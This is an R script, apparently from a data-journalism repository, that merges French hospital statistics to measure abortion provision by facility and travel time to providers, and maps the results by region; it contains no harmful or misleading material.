colfap<-c("SEXE2_AGED100015","SEXE2_AGED100016","SEXE2_AGED100017","SEXE2_AGED100018","SEXE2_AGED100019","SEXE2_AGED100020","SEXE2_AGED100021","SEXE2_AGED100022","SEXE2_AGED100023","SEXE2_AGED100024","SEXE2_AGED100025","SEXE2_AGED100026","SEXE2_AGED100027","SEXE2_AGED100028","SEXE2_AGED100029","SEXE2_AGED100030","SEXE2_AGED100031","SEXE2_AGED100032","SEXE2_AGED100033","SEXE2_AGED100034","SEXE2_AGED100035","SEXE2_AGED100036","SEXE2_AGED100037","SEXE2_AGED100038","SEXE2_AGED100039","SEXE2_AGED100040","SEXE2_AGED100041","SEXE2_AGED100042","SEXE2_AGED100043","SEXE2_AGED100044","SEXE2_AGED100045","SEXE2_AGED100046","SEXE2_AGED100047","SEXE2_AGED100048","SEXE2_AGED100049","SEXE2_AGED100050")
colfap_2<-c("SEXE2_AGED100020","SEXE2_AGED100021","SEXE2_AGED100022","SEXE2_AGED100023","SEXE2_AGED100024","SEXE2_AGED100025","SEXE2_AGED100026","SEXE2_AGED100027","SEXE2_AGED100028","SEXE2_AGED100029","SEXE2_AGED100030","SEXE2_AGED100031","SEXE2_AGED100032","SEXE2_AGED100033","SEXE2_AGED100034","SEXE2_AGED100035")
pop2016$F_AP<-rowSums(pop2016[,colfap])
pop2016$F_AP2<-rowSums(pop2016[,colfap_2])
duree<-merge(duree,pop2016,by.x="code",by.y="CODGEO",all.x=TRUE)
write.csv(duree[,c("code","d2013","d2014","d2018","d1214","diff","diff1214","LIBGEO","F_AP","F_AP2")],"duree_ivg.csv",row.names=FALSE)
#duree<-read.csv("duree_ivg.csv",sep=",")
## FRANCE
tapply(duree$F_AP,cut(duree$d2018,breaks=c(0,30,45,500),labels=c("0-30","30-45","+45")),FUN=sum,na.rm=TRUE)
tapply(duree$F_AP,cut(duree$d1214,breaks=c(0,30,45,500),labels=c("0-30","30-45","+45")),FUN=sum,na.rm=TRUE)
tapply(duree$F_AP,cut(duree$diff,breaks=c(-60,-45,-30,-15,0,15,30,45,60),labels=c("-60m-45m","-45m-30m","-30m-15m","-15m0m","0m+15m","+15m+30m","+30m+45m","+45m+60m")),FUN=sum,na.rm=TRUE)
## Loiret
tapply(subset(duree,startsWith(duree$code,"45"))$F_AP,cut(subset(duree,startsWith(duree$code,"45"))$d2013,breaks=c(0,30,45,500),labels=c("0-30","30-45","+45")),FUN=sum,na.rm=TRUE)
tapply(subset(duree,startsWith(duree$code,"45"))$F_AP,cut(subset(duree,startsWith(duree$code,"45"))$d2018,breaks=c(0,30,45,500),labels=c("0-30","30-45","+45")),FUN=sum,na.rm=TRUE)
tapply(subset(duree,startsWith(duree$code,"45"))$F_AP,cut(subset(duree,startsWith(duree$code,"45"))$diff,breaks=c(-60,-45,-30,-15,0,15,30,45,60),labels=c("-60m-45m","-45m-30m","-30m-15m","-15m0m","0m+15m","+15m+30m","+30m+45m","+45m+60m")),FUN=sum,na.rm=TRUE)
###### moyenne dans le 45 ???
##### durée du trajet par commune * population par commune / population totale
sum(duree$d2018[startsWith(duree$code,"45")]*duree$F_AP[startsWith(duree$code,"45")])/sum(duree$F_AP[startsWith(duree$code,"45")])
## Loire-Atlantique
tapply(subset(duree,startsWith(duree$code,"44"))$F_AP,cut(subset(duree,startsWith(duree$code,"44"))$d2013,breaks=c(0,30,45,500),labels=c("0-30","30-45","+45")),FUN=sum,na.rm=TRUE)
tapply(subset(duree,startsWith(duree$code,"44"))$F_AP,cut(subset(duree,startsWith(duree$code,"44"))$d2018,breaks=c(0,30,45,500),labels=c("0-30","30-45","+45")),FUN=sum,na.rm=TRUE)
tapply(subset(duree,startsWith(duree$code,"44"))$F_AP,cut(subset(duree,startsWith(duree$code,"44"))$diff,breaks=c(-60,-45,-30,-15,0,15,30,45,60),labels=c("-60m-45m","-45m-30m","-30m-15m","-15m0m","0m+15m","+15m+30m","+30m+45m","+45m+60m")),FUN=sum,na.rm=TRUE)
###### moyenne dans le 44 ???
##### durée du trajet par commune * population par commune / population totale
sum(duree$d2018[startsWith(duree$code,"44")]*duree$F_AP[startsWith(duree$code,"44")])/sum(duree$F_AP[startsWith(duree$code,"44")])
## Pays-de-la-Loire
sapply(c("44","49","53","72","85"),function(x){tapply(subset(duree,startsWith(duree$code,x))$F_AP,cut(subset(duree,startsWith(duree$code,x))$d2018,breaks=c(0,30,45,500),labels=c("0-30","30-45","+45")),FUN=sum,na.rm=TRUE)})
sapply(c("44","49","53","72","85"),function(x){sum(duree$d2018[startsWith(duree$code,x)]*duree$F_AP[startsWith(duree$code,x)],na.rm=TRUE)/sum(duree$F_AP[startsWith(duree$code,x)],na.rm=TRUE)})
## Map production: dump the establishment subsets to CSV, then promote the
## 2013 and 2018 subsets to spatial point layers (WGS84) for plotting.
write.csv(ivg_geo_2013,"ivg2013.csv")
# NOTE(review): `ivg_geo_2017` is never created above (only the 2013, 2014
# and 2018 subsets plus ivg1214_geo_2018 exist), so this line errors —
# probably ivg_geo_2014, or a missing 2017 subset, was intended.
write.csv(ivg_geo_2017,"ivg2017.csv")
write.csv(ivg_geo_2018,"ivg2018.csv")
coordinates(ivg_geo_2013)<- ~lon+lat
proj4string(ivg_geo_2013)<-CRS("+proj=longlat +datum=WGS84")
coordinates(ivg_geo_2018)<- ~lon+lat
proj4string(ivg_geo_2018)<-CRS("+proj=longlat +datum=WGS84")
# Draw a choropleth of car travel time to the nearest abortion-providing
# establishment for one metropolitan region, overlay the establishments and
# prefecture labels, then save to cartes/<nom_reg>_<annee>.pdf.
#
# nom_reg: region name as found in france_1$NOM_REG (upper case).
# annee:   "2013" or "2018" — selects the duration column of `duree` and the
#          matching establishment layer; any other value draws the base map
#          only (with a warning).
drawRegion<-function(nom_reg,annee){
  par(bg="#006994")
  region<-france_1[france_1$NOM_REG==nom_reg,]
  # Reproject establishment points into the base map's CRS (local copies).
  ivg_geo_2013<-spTransform(ivg_geo_2013,CRS(proj4string(france_r)))
  ivg_geo_2018<-spTransform(ivg_geo_2018,CRS(proj4string(france_r)))
  # Points of interest for labelling: capital, (sub-)prefectures.
  poi<-subset(region,STATUT=="Capitale d'état" | STATUT=="Préfecture" | STATUT=="Préfecture de région" | STATUT=="Sous-préfecture")
  plot(france_r,col="#DDDDDD",border=1,xlim=bbox(region)[1,],ylim=bbox(region)[2,])
  if(annee=="2013") {
    choroLayer(spdf=region,spdfid="INSEE_COM",df=duree,dfid="code",var="d2013",nclass=7,lwd=0.0001,breaks=c(0,15,30,45,60,75,90,500),col=carto.pal("wine.pal",8),add=TRUE)
    points(ivg_geo_2013,pch=15,cex=0.5,col="red")
  }
  else if(annee=="2018") {
    # Fixed: `duree` has no "d2017" column (its columns are
    # code/d2013/d2014/d2018/d1214), so this branch previously failed;
    # use d2018.
    choroLayer(spdf=region,spdfid="INSEE_COM",df=duree,dfid="code",var="d2018",nclass=7,lwd=0.0001,breaks=c(0,15,30,45,60,75,90,500),col=carto.pal("wine.pal",8),add=TRUE)
    points(ivg_geo_2018,pch=15,cex=0.5,col="red")
  }
  else {
    warning("drawRegion: unsupported annee '",annee,"', drawing base map only")
  }
  points(coordinates(poi),pch=20,cex=0.5,col="white")
  labelLayer(poi,poi@data,spdfid="INSEE_COM",dfid="INSEE_COM",txt="NOM_COM",cex=0.4,pos=2,font=4,offset=0.2,col= "#000000", bg = "#FFFFFF50",halo=TRUE,overlap=FALSE)
  layoutLayer(title = paste(nom_reg,annee),coltitle="black",col=NA,sources="",scale = NULL,author=NULL,frame=FALSE)
  dev.print(pdf,paste('cartes/',nom_reg,'_',annee,'.pdf',sep=""))
}
# Choropleth of car travel time (2018) to the nearest abortion-providing
# establishment for every commune of Mayotte, saved to cartes/MAYOTTE.pdf.
drawRegionMayotte<-function(){
  par(bg="#006994")
  region<-france_2
  # Reproject the 2018 establishments into the commune layer's CRS.
  ivg_geo<-spTransform(ivg_geo_2018,CRS(proj4string(region)))
  poi<-subset(region,STATUT=="Capitale d'état" | STATUT=="Préfecture" | STATUT=="Préfecture de région" | STATUT=="Sous-préfecture")
  plot(region,col="#DDDDDD",border=1,xlim=bbox(region)[1,],ylim=bbox(region)[2,])
  # Fixed: fetchDurees() returns columns code/d2013/d2014/d2018/d1214 — the
  # previous dfid="id" / var="val.x" matched nothing in duree_ma.
  choroLayer(spdf=region,spdfid="INSEE_COM",df=duree_ma,dfid="code",var="d2018",nclass=7,lwd=0.0001,breaks=c(0,15,30,45,60,75,90,500),col=carto.pal("wine.pal",8),add=TRUE)
  points(ivg_geo,pch=15,cex=0.5,col="red")
  points(coordinates(poi),pch=20,cex=0.5,col="white")
  labelLayer(spdf=poi,df=poi@data,spdfid="INSEE_COM",dfid="INSEE_COM",txt="NOM_COM",cex=0.4,pos=2,font=4,offset=0.2,col= "#000000", bg = "#FFFFFF50",halo=TRUE,overlap=TRUE)
  layoutLayer(title = paste("ACCÈS À L'IVG À MAYOTTE"),coltitle="black",col=NA,sources="",scale = NULL,author=NULL,frame=FALSE)
  dev.print(pdf,'cartes/MAYOTTE.pdf')
}
# Choropleth of car travel time (2018) to the nearest abortion-providing
# establishment for every commune of La Réunion, saved to cartes/REUNION.pdf.
drawRegionReunion<-function(){
  par(bg="#006994")
  region<-france_3
  # Reproject the 2018 establishments into the commune layer's CRS.
  ivg_geo<-spTransform(ivg_geo_2018,CRS(proj4string(region)))
  poi<-subset(region,STATUT=="Capitale d'état" | STATUT=="Préfecture" | STATUT=="Préfecture de région" | STATUT=="Sous-préfecture")
  plot(region,col="#DDDDDD",border=1,xlim=bbox(region)[1,],ylim=bbox(region)[2,])
  # Fixed: fetchDurees() returns columns code/d2013/d2014/d2018/d1214 — the
  # previous dfid="id" / var="val.x" matched nothing in duree_lr.
  choroLayer(spdf=region,spdfid="INSEE_COM",df=duree_lr,dfid="code",var="d2018",nclass=7,lwd=0.0001,breaks=c(0,15,30,45,60,75,90,500),col=carto.pal("wine.pal",8),add=TRUE)
  points(ivg_geo,pch=15,cex=0.5,col="red")
  points(coordinates(poi),pch=20,cex=0.5,col="white")
  labelLayer(spdf=poi,df=poi@data,spdfid="INSEE_COM",dfid="INSEE_COM",txt="NOM_COM",cex=0.4,pos=2,font=4,offset=0.2,col= "#000000", bg = "#FFFFFF50",halo=TRUE,overlap=FALSE)
  layoutLayer(title = paste("ACCÈS À L'IVG À LA RÉUNION"),coltitle="black",col=NA,sources="",scale = NULL,author=NULL,frame=FALSE)
  dev.print(pdf,'cartes/REUNION.pdf')
}
# Choropleth of car travel time (2018) to the nearest abortion-providing
# establishment for every commune of Guadeloupe, saved to
# cartes/GUADELOUPE.pdf.
drawRegionGuadeloupe<-function(){
  par(bg="#006994")
  region<-france_4
  # Reproject the 2018 establishments into the commune layer's CRS.
  ivg_geo<-spTransform(ivg_geo_2018,CRS(proj4string(region)))
  poi<-subset(region,STATUT=="Capitale d'état" | STATUT=="Préfecture" | STATUT=="Préfecture de région" | STATUT=="Sous-préfecture")
  plot(region,col="#DDDDDD",border=1,xlim=bbox(region)[1,],ylim=bbox(region)[2,])
  # Fixed: the combined `duree` table has columns code/d2013/d2014/d2018/
  # d1214 — the previous dfid="id" / var="val.x" matched nothing.
  choroLayer(spdf=region,spdfid="INSEE_COM",df=duree,dfid="code",var="d2018",nclass=7,lwd=0.0001,breaks=c(0,15,30,45,60,75,90,500),col=carto.pal("wine.pal",8),add=TRUE)
  points(ivg_geo,pch=15,cex=0.5,col="red")
  points(coordinates(poi),pch=20,cex=0.5,col="white")
  labelLayer(spdf=poi,df=poi@data,spdfid="INSEE_COM",dfid="INSEE_COM",txt="NOM_COM",cex=0.4,pos=2,font=4,offset=0.2,col= "#000000", bg = "#FFFFFF50",halo=TRUE,overlap=FALSE)
  layoutLayer(title = paste("ACCÈS À L'IVG EN GUADELOUPE"),coltitle="black",col=NA,sources="",scale = NULL,author=NULL,frame=FALSE)
  dev.print(pdf,'cartes/GUADELOUPE.pdf')
}
# Choropleth of car travel time (2018) to the nearest abortion-providing
# establishment for every commune of Martinique, saved to
# cartes/MARTINIQUE.pdf.
drawRegionMartinique<-function(){
  par(bg="#006994")
  region<-france_5
  # Reproject the 2018 establishments into the commune layer's CRS.
  ivg_geo<-spTransform(ivg_geo_2018,CRS(proj4string(region)))
  poi<-subset(region,STATUT=="Capitale d'état" | STATUT=="Préfecture" | STATUT=="Préfecture de région" | STATUT=="Sous-préfecture")
  plot(region,col="#DDDDDD",border=1,xlim=bbox(region)[1,],ylim=bbox(region)[2,])
  # Fixed: the combined `duree` table has columns code/d2013/d2014/d2018/
  # d1214 — the previous dfid="id" / var="val" matched nothing.
  choroLayer(spdf=region,spdfid="INSEE_COM",df=duree,dfid="code",var="d2018",nclass=7,lwd=0.0001,breaks=c(0,15,30,45,60,75,90,500),col=carto.pal("wine.pal",8),add=TRUE)
  points(ivg_geo,pch=15,cex=0.5,col="red")
  points(coordinates(poi),pch=20,cex=0.5,col="white")
  labelLayer(spdf=poi,df=poi@data,spdfid="INSEE_COM",dfid="INSEE_COM",txt="NOM_COM",cex=0.4,pos=2,font=4,offset=0.2,col= "#000000", bg = "#FFFFFF50",halo=TRUE,overlap=FALSE)
  layoutLayer(title = paste("ACCÈS À L'IVG EN MARTINIQUE"),coltitle="black",col=NA,sources="",scale = NULL,author=NULL,frame=FALSE)
  dev.print(pdf,'cartes/MARTINIQUE.pdf')
}
# Choropleth of car travel time (2018) to the nearest abortion-providing
# establishment for every commune of Guyane, saved to cartes/GUYANE.pdf.
drawRegionGuyane<-function(){
  par(bg="#006994")
  region<-france_6
  # Reproject the 2018 establishments into the commune layer's CRS.
  ivg_geo<-spTransform(ivg_geo_2018,CRS(proj4string(region)))
  poi<-subset(region,STATUT=="Capitale d'état" | STATUT=="Préfecture" | STATUT=="Préfecture de région" | STATUT=="Sous-préfecture")
  plot(region,col="#DDDDDD",border=1,xlim=bbox(region)[1,],ylim=bbox(region)[2,])
  # Fixed: the combined `duree` table has columns code/d2013/d2014/d2018/
  # d1214 — the previous dfid="id" / var="val" matched nothing.
  choroLayer(spdf=region,spdfid="INSEE_COM",df=duree,dfid="code",var="d2018",nclass=7,lwd=0.0001,breaks=c(0,15,30,45,60,75,90,500),col=carto.pal("wine.pal",8),add=TRUE)
  points(ivg_geo,pch=15,cex=0.5,col="red")
  points(coordinates(poi),pch=20,cex=0.5,col="white")
  labelLayer(spdf=poi,df=poi@data,spdfid="INSEE_COM",dfid="INSEE_COM",txt="NOM_COM",cex=0.4,pos=2,font=4,offset=0.2,col= "#000000", bg = "#FFFFFF50",halo=TRUE,overlap=FALSE)
  layoutLayer(title = paste("ACCÈS À L'IVG EN GUYANE"),coltitle="black",col=NA,sources="",scale = NULL,author=NULL,frame=FALSE)
  dev.print(pdf,'cartes/GUYANE.pdf')
}
# Draw every map: the five overseas territories (dedicated functions), then
# one 2018 map per metropolitan region.
drawRegions<-function() {
  drawRegionMayotte()
  drawRegionReunion()
  drawRegionGuadeloupe()
  drawRegionMartinique()
  drawRegionGuyane()
  regions_metropole <- c(
    "AUVERGNE-RHONE-ALPES", "BOURGOGNE-FRANCHE-COMTE", "BRETAGNE",
    "CENTRE-VAL DE LOIRE", "CORSE", "GRAND EST", "HAUTS-DE-FRANCE",
    "ILE-DE-FRANCE", "NORMANDIE", "NOUVELLE-AQUITAINE", "OCCITANIE",
    "PAYS DE LA LOIRE", "PROVENCE-ALPES-COTE D'AZUR"
  )
  for (nom_reg in regions_metropole) {
    drawRegion(nom_reg, "2018")
  }
}
drawRegions()
drawRegion("CENTRE-VAL DE LOIRE","2013")
drawRegion("CENTRE-VAL DE LOIRE","2017")
## Exports régionaux
# Export the SAE and ScanSanté (CCAM) abortion tables for one set of
# departements to exports/sae_<nom>.csv and exports/scansante_<nom>.csv.
#
# liste: character vector of departement codes to keep
# nom:   suffix used in the output file names
extractRegion<- function(liste,nom) {
  ## SAE extraction
  ivg_local<-subset(ivg,departement %in% liste)
  # NOTE(review): the presence of CONV/EFFPL/EFFPA/ETP in `ivg` depends on
  # the raw perinat tables (EFFPL/EFFPA/ETP were renamed with _IVG/_GY
  # suffixes during the merge above) — confirm these columns still exist.
  ivg_local<-ivg_local[,c("AN","rs","departement","libcategetab","IVG","IVGME","CONV","EFFPL","EFFPA","ETP","siret","nofinessej")]
  colnames(ivg_local)<-c("Année","Nom","Département","Type d'établissement","Nombre d'IVG","Nombre d'IVG médicamenteuses","Conventions","Temps plein","Temps partiel","ETP moyens","Siret","Finess")
  filename=paste("exports/sae_",nom,".csv",sep="")
  write.csv(ivg_local,file=filename,row.names=FALSE)
  ## CCAM extraction
  ivg_local_ccam<-subset(ivg_ccam,departement %in% liste)
  # NOTE(review): read_ivgCCAM() drops ccam.c/ccam.m/ccam.img2 and keeps no
  # plain "ccam" column, so this selection should fail — verify against the
  # actual ivg_ccam columns (nb_actes.c/.m/.img2/.acc, nb_actes).
  ivg_local_ccam<-ivg_local_ccam[,c("annee","rs","departement","libcategetab","ccam","nb_actes","siret","nofinessej")]
  colnames(ivg_local_ccam)<-c("Année","Nom","Département","Type d'établissement","Type d'IVG","Nombre d'IVG","Siret","Finess")
  filename_ccam=paste("exports/scansante_",nom,".csv",sep="")
  write.csv(ivg_local_ccam,file=filename_ccam,row.names=FALSE)
  # Console summary of how many establishments appear in each export.
  print(paste(length(table(ivg_local$Nom))," établissements dans le SAE et ",length(table(ivg_local_ccam$Nom))," dans ScanSanté",sep=""))
}
| /acces-ivg/acces-ivg.R | no_license | alphoenix/donnees | R | false | false | 29,236 | r | ## Imports des librairies
library(haven)
library(plyr)
library(dplyr)
library(reshape)
library(devtools)
library(data.table)
library(cartography)
library(rgdal)
library(SpatialPosition)
library(xlsx)
library(osrm)
options(osrm.server="http://0.0.0.0:5000/")
## Load the geocoded FINESS facility database
devtools::install_github('jomuller/finess',ref='47de6e2')
data(finess_geo, package = 'finess')
## Add data from the annual statistics of health facilities (SAE, statistical base), 2013-2018
## http://www.data.drees.sante.gouv.fr/ReportFolders/reportFolders.aspx
datp2013<-read_sas("files/perinat_p_2013a.sas7bdat")
datp2014<-read_sas("files/perinat_p_2014a.sas7bdat")
datp2015<-read_sas("files/perinat_p_2015a.sas7bdat")
datp2016<-read_sas("files/perinat_p_2016a.sas7bdat")
datp2017<-read_sas("files/perinat_p_2017r.sas7bdat")
datp2018<-read_sas("files/perinat_p_2018.sas7bdat")
## Number of physicians taking part in abortion activity (SAE / personnel code MIVG).
## Original author's caveat kept: these staffing figures are considered unreliable.
mivg2013<-subset(datp2013,PERSO=="MIVG")
mivg2014<-subset(datp2014,PERSO=="MIVG")
mivg2015<-subset(datp2015,PERSO=="MIVG")
mivg2016<-subset(datp2016,PERSO=="MIVG")
mivg2017<-subset(datp2017,PERSO=="MIVG")
mivg2018<-subset(datp2018,PERSO=="MIVG")
mivg<-rbind(mivg2013,mivg2014,mivg2015,mivg2016,mivg2017,mivg2018)
# Suffix the staffing columns (full-time / part-time / FTE) so they can be told
# apart from the gynecologists' equivalents added below.
names(mivg)[names(mivg) == "EFFPL"] <- "EFFPL_IVG"
names(mivg)[names(mivg) == "EFFPA"] <- "EFFPA_IVG"
names(mivg)[names(mivg) == "ETP"] <- "ETP_IVG"
mivg<-subset(mivg,select=-c(PERSO,GAR,GARDED,ASTDED,AST,BOR))
## Number of gynecologists (SAE / personnel code M2050)
mgy_2013<-subset(datp2013,PERSO=="M2050")
mgy_2014<-subset(datp2014,PERSO=="M2050")
mgy_2015<-subset(datp2015,PERSO=="M2050")
mgy_2016<-subset(datp2016,PERSO=="M2050")
mgy_2017<-subset(datp2017,PERSO=="M2050")
mgy_2018<-subset(datp2018,PERSO=="M2050")
mgy<-rbind(mgy_2013,mgy_2014,mgy_2015,mgy_2016,mgy_2017,mgy_2018)
names(mgy)[names(mgy) == "EFFPL"] <- "EFFPL_GY"
names(mgy)[names(mgy) == "EFFPA"] <- "EFFPA_GY"
names(mgy)[names(mgy) == "ETP"] <- "ETP_GY"
mgy<-subset(mgy,select=-c(PERSO,GAR,GARDED,ASTDED,AST,BOR))
# Full outer join: keep facilities that report either abortion staff or gynecologists
mivg<-merge(mivg,mgy,by.x=c("AN","FI_EJ","FI"),by.y=c("AN","FI_EJ","FI"),all.x=TRUE,all.y=TRUE)
## Number of abortion procedures and deliveries (PERINAT tables of the SAE)
dat2013<-read_sas("files/perinat_2013r.sas7bdat")
dat2014<-read_sas("files/perinat_2014r.sas7bdat")
dat2015<-read_sas("files/perinat_2015r.sas7bdat")
dat2016<-read_sas("files/perinat_2016r.sas7bdat")
dat2017<-read_sas("files/perinat_2017r.sas7bdat")
dat2018<-read_sas("files/perinat_2018.sas7bdat")
# rbind.fill: the yearly tables do not share exactly the same column set
nivg<-rbind.fill(dat2014,dat2013,dat2015,dat2016,dat2017,dat2018)
## FINAL FILE: staffing + activity, one row per facility and year
ivg<-merge(mivg,nivg,by.x=c("AN","FI_EJ","FI"),by.y=c("AN","FI_EJ","FI"),all.x=TRUE,all.y=TRUE)
## Add facility metadata (name, address, coordinates...) from the FINESS base
ivg<-merge(ivg,finess_geo,by.x="FI",by.y="nofinesset",all.x=TRUE)
## DERIVED COLUMNS
# Number of deliveries (stillbirths included): multiple + single births
ivg$ACC<-ivg$ACCMU+ivg$ACCUN
# Department: first two characters of the FINESS number
ivg$DPT<-substr(ivg$FI,start=1,stop=2)
dpt_reg<-read.csv("files/departement2019.csv",sep=",",col.names=c("dep","reg","cheflieu","tncc","ncc","nccenr","libelle"))
ivg<-merge(ivg,dpt_reg,by.x="DPT",by.y="dep",all.x=TRUE)
## Backfill facilities with no match in the current FINESS base from an older extract
finess_old<-read.csv("files/finess_old.csv",sep=";",col.names=c("nofinesset","nofinessej","rs","rslongue","complrs","compldistrib","numvoie","typvoie","voie","compvoie","lieuditbp","region","libregion","departement","libdepartement","cog","codepostal","libelle_routage","ligneacheminement","telephone","telecopie","categetab","libcategetab","liblongcategetab","categretab","libcategretab","siret","codeape","libcodeape","mft","libmft","liblongmft","sph","libsph","numen","coordx","coordy","sourcegeocod","dategeocod","dateautor","dateouvert","datemaj","lat","lon"),stringsAsFactors=FALSE,colClasses=c(rep("character",44)))
# NOTE: the two lines below key on is.na(lat), so they must run BEFORE lat is
# filled in — keep this ordering.
ivg$rs[is.na(ivg$lat)]<-finess_old$rs[match(ivg$FI,finess_old$nofinesset)][which(is.na(ivg$lat))]
ivg$departement[is.na(ivg$lat)]<-finess_old$departement[match(ivg$FI,finess_old$nofinesset)][which(is.na(ivg$lat))]
ivg$lat[is.na(ivg$lat)]<-finess_old$lat[match(ivg$FI,finess_old$nofinesset)][which(is.na(ivg$lat))]
ivg$lon[is.na(ivg$lon)]<-finess_old$lon[match(ivg$FI,finess_old$nofinesset)][which(is.na(ivg$lon))]
## EXPORT
write.csv(ivg,file="ivg.csv",row.names = FALSE)
## Cleanup of intermediate yearly tables
rm(mivg2013,mivg2014,mivg2015,mivg2016,mivg2017,mivg2018)
rm(mgy_2013,mgy_2014,mgy_2015,mgy_2016,mgy_2017,mgy_2018)
rm(datp2013,datp2014,datp2015,datp2016,datp2017,datp2018)
rm(dat2013,dat2014,dat2015,dat2016,dat2017,dat2018)
rm(nivg,mivg,mgy)
## Number of facilities in 2018 (SAE): late (12-14 week), surgical, and any abortions
ivg %>% filter(IVG1214 > 0 & AN == "2018") %>% nrow
ivg %>% filter(IVG-IVGME > 0 & AN == "2018") %>% nrow
ivg %>% filter(IVG > 0 & AN == "2018") %>% nrow
ivg %>% filter(IVG1214 > 0 & AN == "2018") %>% cast(libcategetab~AN,length,value="IVG1214") %>% View
ivg %>% filter(IVG-IVGME > 0 & AN == "2018") %>% cast(libcategetab~AN,length,value="IVG") %>% View
ivg %>% filter(IVG > 0 & AN == "2018") %>% cast(libcategetab~AN,length,value="IVG") %>% View
### Share of medication abortions per facility
### (below 5% / below average / above average / 95%+ exclusively) — average: 0.5416
ivg$tx_me<-ivg$IVGME/ivg$IVG
# IVGME > 0 with IVG == 0 yields Inf; treat as 100% medication
ivg$tx_me[is.infinite(ivg$tx_me)]<-1
# BUG FIX: numerator and denominator covered different years (IVGME of 2017 over
# IVG of 2018); both now use 2017, consistent with the mean() just below.
sum(ivg$IVGME[ivg$AN == "2017"],na.rm=TRUE)/sum(ivg$IVG[ivg$AN == "2017"],na.rm=TRUE)
mean(ivg$tx_me[ivg$AN == "2017"],na.rm=TRUE)
### Share of late (12-14 week) abortions (none / few / average) — average: 0.0761
ivg$tx_1214<-ivg$IVG1214/ivg$IVG
# BUG FIX: same mixed-year bug as above (IVG1214 of 2017 over IVG of 2018)
sum(ivg$IVG1214[ivg$AN == "2017"],na.rm=TRUE)/sum(ivg$IVG[ivg$AN == "2017"],na.rm=TRUE)
mean(ivg$tx_1214[ivg$AN == "2017"],na.rm=TRUE)
### Evolution 2013-2017 of abortion counts per facility (rising // stable // falling)
ivg_export <- ivg %>% filter(AN == "2013" | AN == "2017") %>% group_by(FI) %>% arrange(AN, .by_group = TRUE) %>% mutate(ivg_change = (IVG/lag(IVG) - 1)) %>% mutate(acc_change = (ACC/lag(ACC) - 1)) %>% filter(AN == "2017")
# BUG FIX: breaks were c(-1.01,1,-0.05,0.05,13). cut() sorts its breaks
# internally, so every label was shifted by one interval (declines were tagged
# "arrêt", growth up to +100% was tagged "stable"...). "arrêt" is meant to
# capture a -100% change, i.e. activity stopped, hence the -1 cut point.
ivg_export$cat_evol<-cut(ivg_export$ivg_change,breaks=c(-1.01,-1,-0.05,0.05,13),labels=c("arrêt","en chute","stable","en hausse"),right=TRUE)
# BUG FIX: cat_medic and cat_1214 are exported below but were never created,
# which made the write.csv() fail with "undefined columns selected".
# Thresholds derived from the section comments above (5% / mean 0.5416 / 95%
# and 0 / mean 0.0761) — TODO confirm the intended category labels/cut points.
ivg_export$cat_medic<-cut(ivg_export$tx_me,breaks=c(-0.01,0.05,0.5416,0.95,1.01),labels=c("moins de 5%","moins que la moyenne","plus que la moyenne","plus de 95%"),right=TRUE)
ivg_export$cat_1214<-cut(ivg_export$tx_1214,breaks=c(-0.01,0,0.0761,1.01),labels=c("aucune","peu","moyenne ou plus"),right=TRUE)
### EXPORT
write.csv(ivg_export[,c("FI","DPT","ligneacheminement","rs","libcategetab","IVG","IVGME","IVG1214","ACC","ivg_change","acc_change","cat_evol","tx_me","cat_medic","tx_1214","cat_1214","lat","lon")],"exports/ivg_export.csv",na="",row.names=FALSE)
## Facility exports, 2018
result<-ivg %>% filter(AN == "2013" | AN == "2018") %>% group_by(FI) %>% arrange(AN, .by_group = TRUE) %>% mutate(ivg_change = (IVG/lag(IVG) - 1)) %>% mutate(acc_change = (ACC/lag(ACC) - 1)) %>% filter(AN == "2018")
write.csv(result[,c("FI","DPT","ligneacheminement","rs","libcategetab","IVG","IVGME","ivg_change","acc_change")],"exports/change.csv",na="",row.names=FALSE)
# NOTE(review): ivg_ccam is only built further down in this file — these two
# exports assume the script is run interactively after that section; confirm.
write.csv(merge(subset(ivg_ccam,annee == "2018"),ivg[,c("FI","AN","IVG","IMG")],by.x=c("finess_geo","annee"),by.y=c("FI","AN"),all.x=TRUE)[,c("annee","finess_geo","dep","ligneacheminement","rs","libcategetab","nb_actes.c","nb_actes.m","nb_actes.img2","nb_actes.acc","tx","IVG","IMG")],"exports/ccam.csv",na="",row.names=FALSE)
write.csv(merge(subset(ivg_ccam,annee == "2017"),ivg[,c("FI","AN","IVG","IMG")],by.x=c("finess_geo","annee"),by.y=c("FI","AN"),all.x=TRUE)[,c("annee","finess_geo","dep","ligneacheminement","rs","libcategetab","nb_actes.c","nb_actes.m","nb_actes.img2","nb_actes.acc","tx","IVG","IMG")],"exports/ccam17.csv",na="",row.names=FALSE)
write.csv(subset(ivg[,c("AN","FI","DPT","ligneacheminement","rs","libcategetab","IVG","IVGME","IVG1214","lat","lon")],AN=="2018"),"exports/sae.csv",na="",row.names=FALSE)
## Read one year of the PMSI / Open-CCAM procedure file and build, per geographic
## FINESS number, the counts of abortion-related procedures plus deliveries.
## `year` is a two-digit string ("15".."18"); files from 2018 onwards carry extra
## columns. Returns one data frame with the year attached.
read_ivgCCAM <- function(year) {
filename = paste("files/open_ccam_",year,".csv",sep="")
# NOTE: `year` is a character string, so this relies on string/number coercion
# ("15" < 18 compares as "15" < "18") — fine for the "15".."18" inputs used here.
if(year < 18) {
ccam<-read.csv(filename,sep=";",col.names=c("finess","finess_geo","ccam","nb_actes","dms","nb_sej_0_nuit","dep","reg"))
ccam<-subset(ccam,select=-c(dms,nb_sej_0_nuit))
}
else {
ccam<-read.csv(filename,sep=";",col.names=c("finess","finess_geo","ccam","nb_sejsea","nb_actes","dms","nb_sej_0_nuit","nb_actes_ambu","dep","reg"))
ccam<-subset(ccam,select=-c(nb_sejsea,dms,nb_sej_0_nuit,nb_actes_ambu))
}
## Abortion procedure subsets, by CCAM code
ivg_ccamc<-subset(ccam,ccam=="JNJD0020") ## Evacuation of a gravid uterus by aspiration and/or curettage, 1st trimester
ivg_ccamm<-subset(ccam,ccam=="JNJP0010") ## Evacuation of a gravid uterus by medication, 1st trimester
ivg_ccamimg<-subset(ccam,ccam=="JNJD0010") ## Evacuation of a gravid uterus, 2nd trimester before the 22nd week of amenorrhea
# Merge the three series into one row per facility (suffixes .c = curettage, .m = medication)
ivg_ccam<-merge(ivg_ccamc,ivg_ccamm,by.x=c("finess","finess_geo","dep","reg"),by.y=c("finess","finess_geo","dep","reg"),all.x=TRUE,all.y=TRUE,suffix=c(".c",".m"))
ivg_ccam<-merge(ivg_ccam,ivg_ccamimg,by.x=c("finess","finess_geo","dep","reg"),by.y=c("finess","finess_geo","dep","reg"),all.x=TRUE,all.y=TRUE)
